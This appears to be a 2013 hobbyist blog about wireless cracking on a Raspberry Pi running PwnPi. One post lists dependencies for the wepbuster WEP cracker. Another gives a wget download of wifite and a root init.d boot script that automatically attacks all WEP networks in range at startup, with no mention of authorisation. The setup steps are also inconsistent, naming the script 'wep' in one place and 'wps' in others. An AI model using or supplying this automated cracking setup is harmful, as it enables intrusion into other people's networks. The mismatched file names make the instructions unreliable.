Tuesday 29 January 2013

Wepbuster on PI

I've been playing with PWNPI and one of my fav wep cracking scripts is wepbuster but when you try to install it there are issues.


found a quick and easy way to install all the bits and bobs it requires:

apt-get install libterm-readkey-perl libnet-scp-expect-perl libfile-policy-perl libnumber-range-perl libalgorithm-permute-perl libparallel-forkmanager-perl

Latest Version of Wepbuster:

http://wepbuster.googlecode.com/files/wepbuster-1.0_beta-0.7.tgz

Thursday 24 January 2013

Wifite Automated hacking WEP

My Little Automated Boot up Wep hack script



Download Wifite
 wget -O wifite.py http://wifite.googlecode.com/svn/trunk/wifite.py && chmod +x wifite.py



Set up the boot service

nano /etc/init.d/wep

Copy and paste the below in:



# First configure the user you want to run this under - this will generally be root, unless you've created your own users
export USER='root'
eval cd ~$USER
# Check the state of the command - this'll either be start or stop 
case "$1" in
  start)
    # Start the wifi cracker
    su $USER -c '/root/wifite.py -wep -all -mac '
    echo "Starting wepcrack for $USER "
    ;;
  stop)
    # if it's stop, then just kill the process
    pkill wifite.py
    echo "cracking stopped"
    ;;
  *)
    echo "Usage: /etc/init.d/wep {start|stop}"
    exit 1
    ;;
esac
exit 0
Change the permissons:
chmod 755 /etc/init.d/wps

Add to start up
update-rc.d wps defaults

Amazon

Donate

Donate Towards More Raspberry PI's for Projects